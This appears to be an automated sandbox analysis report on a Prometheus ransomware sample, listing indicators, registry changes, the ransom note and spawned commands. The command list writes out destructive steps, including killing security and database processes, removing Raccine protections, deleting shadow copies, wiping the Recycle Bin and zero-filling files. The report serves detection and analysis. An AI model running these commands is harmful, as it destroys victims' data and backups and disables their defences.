Analysis Overview
SHA256
779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
Threat Level: Known bad
The file 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Prometheus Ransomware
Downloads PsExec from SysInternals website
Modifies extensions of user files
Executes dropped EXE
Modifies Windows Firewall
Downloads MZ/PE file
Windows security modification
Deletes itself
Drops startup file
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Enumerates physical storage devices
Modifies data under HKEY_USERS
Modifies registry key
Suspicious use of WriteProcessMemory
Runs ping.exe
Kills process with taskkill
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
System policy modification
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-30 11:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2021-05-28 06:51
Reported
2021-05-28 06:53
Platform
win7v20210410
Max time kernel
118s
Max time network
52s
Command Line
Signatures
Prometheus Ransomware
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec64.exe | N/A | N/A |
Modifies Windows Firewall
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
"C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe"
C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
C:\Windows\system32\arp.exe
"arp" -a
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
C:\Windows\system32\arp.exe
"arp" -a
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | live.sysinternals.com | udp |
| GB | 20.49.223.105:80 | live.sysinternals.com | tcp |
| N/A | 10.7.0.255:3 | udp | |
| N/A | 10.7.0.255:3 | udp |
Files
memory/1084-59-0x00000000008D0000-0x00000000008D1000-memory.dmp
memory/1084-61-0x000000001A970000-0x000000001A972000-memory.dmp
memory/756-62-0x0000000000000000-mapping.dmp
memory/1120-63-0x0000000000000000-mapping.dmp
memory/1052-64-0x0000000000000000-mapping.dmp
memory/980-65-0x0000000000000000-mapping.dmp
memory/864-66-0x0000000000000000-mapping.dmp
memory/652-67-0x0000000000000000-mapping.dmp
memory/544-68-0x0000000000000000-mapping.dmp
memory/704-69-0x0000000000000000-mapping.dmp
memory/864-70-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp
memory/1728-71-0x0000000000000000-mapping.dmp
memory/800-72-0x0000000000000000-mapping.dmp
memory/1616-73-0x0000000000000000-mapping.dmp
memory/768-74-0x0000000000000000-mapping.dmp
memory/728-75-0x0000000000000000-mapping.dmp
memory/1184-76-0x0000000000000000-mapping.dmp
memory/788-79-0x0000000000000000-mapping.dmp
memory/1248-78-0x0000000000000000-mapping.dmp
memory/824-77-0x0000000000000000-mapping.dmp
memory/1708-81-0x0000000000000000-mapping.dmp
memory/1964-82-0x0000000000000000-mapping.dmp
memory/1596-83-0x0000000000000000-mapping.dmp
memory/860-84-0x0000000000000000-mapping.dmp
memory/1060-85-0x0000000000000000-mapping.dmp
memory/1088-87-0x0000000000000000-mapping.dmp
memory/1612-86-0x0000000000000000-mapping.dmp
memory/532-88-0x0000000000000000-mapping.dmp
memory/396-89-0x0000000000000000-mapping.dmp
memory/1300-90-0x0000000000000000-mapping.dmp
memory/1112-92-0x0000000000000000-mapping.dmp
memory/1704-91-0x0000000000000000-mapping.dmp
memory/1600-93-0x0000000000000000-mapping.dmp
memory/2028-94-0x0000000000000000-mapping.dmp
memory/1160-95-0x0000000000000000-mapping.dmp
memory/284-96-0x0000000000000000-mapping.dmp
memory/1068-97-0x0000000000000000-mapping.dmp
memory/572-98-0x0000000000000000-mapping.dmp
memory/1912-99-0x0000000000000000-mapping.dmp
memory/1516-100-0x0000000000000000-mapping.dmp
memory/1932-101-0x0000000000000000-mapping.dmp
memory/1360-102-0x0000000000000000-mapping.dmp
memory/436-103-0x0000000000000000-mapping.dmp
memory/932-104-0x0000000000000000-mapping.dmp
memory/672-105-0x0000000000000000-mapping.dmp
memory/292-106-0x0000000000000000-mapping.dmp
memory/1688-108-0x0000000000000000-mapping.dmp
memory/1716-109-0x0000000000000000-mapping.dmp
memory/320-107-0x0000000000000000-mapping.dmp
memory/1012-110-0x0000000000000000-mapping.dmp
memory/992-111-0x0000000000000000-mapping.dmp
memory/1756-112-0x0000000000000000-mapping.dmp
memory/328-113-0x0000000000000000-mapping.dmp
memory/1144-114-0x0000000000000000-mapping.dmp
memory/1308-115-0x0000000000000000-mapping.dmp
memory/1476-116-0x0000000000000000-mapping.dmp
memory/776-117-0x0000000000000000-mapping.dmp
memory/1348-119-0x0000000000000000-mapping.dmp
memory/956-118-0x0000000000000000-mapping.dmp
memory/1432-120-0x0000000000000000-mapping.dmp
memory/1620-121-0x0000000000000000-mapping.dmp
memory/1540-122-0x0000000000000000-mapping.dmp
memory/644-123-0x0000000000000000-mapping.dmp
memory/892-124-0x0000000000000000-mapping.dmp
memory/1956-125-0x0000000000000000-mapping.dmp
memory/268-126-0x0000000000000000-mapping.dmp
memory/268-128-0x0000000002450000-0x0000000002451000-memory.dmp
memory/268-129-0x000000001AB80000-0x000000001AB81000-memory.dmp
memory/268-130-0x00000000026C0000-0x00000000026C1000-memory.dmp
memory/268-131-0x000000001AB00000-0x000000001AB02000-memory.dmp
memory/268-132-0x000000001AB04000-0x000000001AB06000-memory.dmp
memory/268-133-0x000000001A7A0000-0x000000001A7A1000-memory.dmp
memory/728-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | c09e7c742e3531ba4c982b035ef6e994 |
| SHA1 | 9fbae0889aa69c457a70da69b58aee327fd1c9cc |
| SHA256 | 5595fdf90977d8d5d34aa7cd47395e9b9292a425f4a6824d1586c2d120cfc6e0 |
| SHA512 | 6e7e789827184c1613d0dfc2397b78d8525ad72631af7d80b1b7d06eac9f06ecebbb2705a578f30dbc162d12def1b74fddcf104cfaab9f9d2e0475cab31f9051 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-05-28 06:51
Reported
2021-05-28 06:53
Platform
win10v20210410
Max time kernel
145s
Max time network
147s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Prometheus Ransomware
Downloads MZ/PE file
Downloads PsExec from SysInternals website
| Description | Indicator | Process | Target |
| HTTP URL | http://live.sysinternals.com/PsExec64.exe | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
Modifies Windows Firewall
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\BlockConnect.tiff | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OutWatch.tiff | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" | C:\Users\Admin\AppData\Local\Temp\779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
